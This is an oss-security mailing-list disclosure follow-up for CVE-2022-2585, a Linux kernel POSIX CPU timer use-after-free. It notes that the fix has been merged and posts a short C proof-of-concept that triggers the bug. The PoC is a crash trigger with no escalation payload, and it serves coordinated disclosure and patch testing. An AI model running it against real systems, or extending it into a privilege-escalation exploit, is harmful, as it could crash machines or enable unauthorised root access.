[prev in list] [next in list] [prev in thread] [next in thread] 

List:       oss-security
Subject:    Re: [oss-security] CVE-2022-2585 - Linux kernel POSIX CPU timer UAF
From:       Thadeu Lima de Souza Cascardo <cascardo () canonical ! com>
Date:       2022-08-17 20:29:35
Message-ID: Yv1Pry60yZ6mOscO () quatroqueijos
[Download RAW message or body]

On Tue, Aug 09, 2022 at 02:13:40PM -0300, Thadeu Lima de Souza Cascardo wrote:
> CVE-2022-2585 - Linux kernel POSIX CPU timer UAF
> 
> It was discovered that when exec'ing from a non-leader thread, armed POSIX
> CPU timers would be left on a list but freed, leading to a use-after-free.
> 
> An independent security researcher working with SSD Secure Disclosure
> discovered that this vulnerability could be exploited for Local Privilege
> Escalation.
> 
> This bug was introduced by commit 55e8c8eb2c7b ("posix-cpu-timers: Store a
> reference to a pid not a task"), which is present since v5.7-rc1.
> 
> This has been assigned CVE-2022-2585.
> 
> A PoC that will trigger KASAN is going to be posted in a week.
> 
> A fix has been sent to linux-kernel@vger.kernel.org and is at
> https://lore.kernel.org/lkml/20220809170751.164716-1-cascardo@canonical.com/T/#u.

This has been merged as commit e362359ace6f87c201531872486ff295df306d13.

The PoC should be built with the name poc as that is what it tries to exec.

#define _GNU_SOURCE
#include <sched.h>
#include <time.h>
#include <unistd.h>
#include <sys/wait.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>

static int timer_uaf(void *d)
{
	timer_t tid;
	struct itimerspec its;

	its.it_interval.tv_sec = 3;
	its.it_interval.tv_nsec = 0;
	its.it_value.tv_sec = 3;
	its.it_value.tv_nsec = 0;
	timer_create(CLOCK_THREAD_CPUTIME_ID, NULL, &tid);
	timer_settime(tid, 0, &its, NULL);
	execlp("./poc", "poc1", NULL);
}

static char stack[8192];

int main(int argc, char **argv)
{
	timer_t tid;
	int i;

	if (!strcmp(argv[0], "poc1")) {
		sleep(2);
		exit(0);
	}

	if (fork() > 0) {
		waitpid(-1, NULL, 0);
		exit(0);
	}

	clone(timer_uaf, stack+4096, SIGCHLD | CLONE_VM | CLONE_SIGHAND | CLONE_THREAD, NULL, NULL, NULL);

	while(1);

	return 0;
}
[prev in list] [next in list] [prev in thread] [next in thread]